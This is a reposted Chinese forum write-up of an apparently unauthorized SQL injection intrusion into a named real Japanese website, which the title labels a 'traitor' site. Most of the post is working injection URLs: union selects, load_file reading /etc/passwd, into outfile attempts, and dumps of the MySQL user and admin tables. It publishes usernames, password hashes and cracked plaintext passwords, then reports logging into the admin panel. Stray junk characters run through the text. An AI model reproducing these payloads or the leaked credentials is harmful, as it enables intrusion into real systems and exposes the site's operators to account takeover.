原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

; a2 ?1 s3 ?# l: Y; r8 T" h# I
0x01. 检测 www.zuaa.jp 收集数据


* H* b; X1 Q( |! i1 Owhatweb


" K2 N% d/ }0 ?" g; x利用NMAP扫描

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
2 b# ~+ a! c, d, o' }# s* Z
. m7 g3 `5 D1 v$ P
0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
0 l! v+ Q- g( ?/ R/ S( w- \9 m0 r
order by 28报错，order by 27正常

; r& Z9 f! \' M- Z/ H" W6 I1 G0x04.   union手动查询
" g/ n- o2 L$ v. w; Rhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
/ p# y2 d$ s" C  o5 k添加到 27 时正常显示

7 D% P1 U$ [0 G0 ]6 O中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x05. info:
3 X3 z# S; P' v* ^% Z8 X0 }http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) H; {* e' k! l4 o$ ]$ y) i
user:            root@localhost
database:    openpne
version:      4.1.22
os:             portbld-freebsd5.4
& y3 ~6 Q" G: Q4 p
0x06. root用户
" H. N4 l0 w% ]1 W2 C5 o利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
0 V+ Y, {. H4 t+ `http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

: G6 f4 T' ]1 H& H  F& z- \0 h通过工具转换
1 K0 b2 X9 f6 l( w7 d* N
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

3 q+ x& T* z( Y9 c7 h0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

4 m1 X" V! i- Z1 M& \http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
/ J* h: W5 E6 b
5 X  W; m# R5 J' E0x08. 利用 mysql 4.1
8 s5 G/ Z* E2 w& Q8 [( n. g猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
, E! ~& l# W5 i6 X# _
) X$ n/ k& ?+ V3 Z( C
* K0 a5 }" Z% S1 Y
' e* l' `4 V2 T2 H$ |# B0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

1 |2 f5 }+ P/ S* c* a  S+ I" x$ [8 R0x10.  MySL外联方法
! t  H  @8 B3 c% o  g从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
4 y6 Z' d% T: T( `. O/ Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

; z" k: v% }# G* V" a0 j% _/ z这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
& E2 A* {. R3 p, @5 hzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
# z0 D/ m1 F1 C7 b5 m7 x+ g8 A工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
; X8 q3 x" ~) P) D
) C: c: s5 X, F% n4 Q, I
0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码
3 l% {0 }5 h+ {0 X2 D
6 b1 j  s, U: j; X
0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login

& E6 ^% D. }! i( i* o( k4 d3 H" a# {表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
' u, }: B; E+ H9 Z! E$ k$ _; kzuaajp:c0923ec5857796a393da99905008c176,          zju1897
5 _) R2 g) s5 a  Z0 h
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台



3 K6 ]. `: l  z; p% a0x14. 小结
- p% D% r$ Y/ A( D! B% Y  m) B利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
' @6 g% ^+ f3 E& h2 g3 y% V感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
6 g: E# r& n# ~------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
2 o# p# J" u8 o, v
+ @; X- X, S" ^! ?* [最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的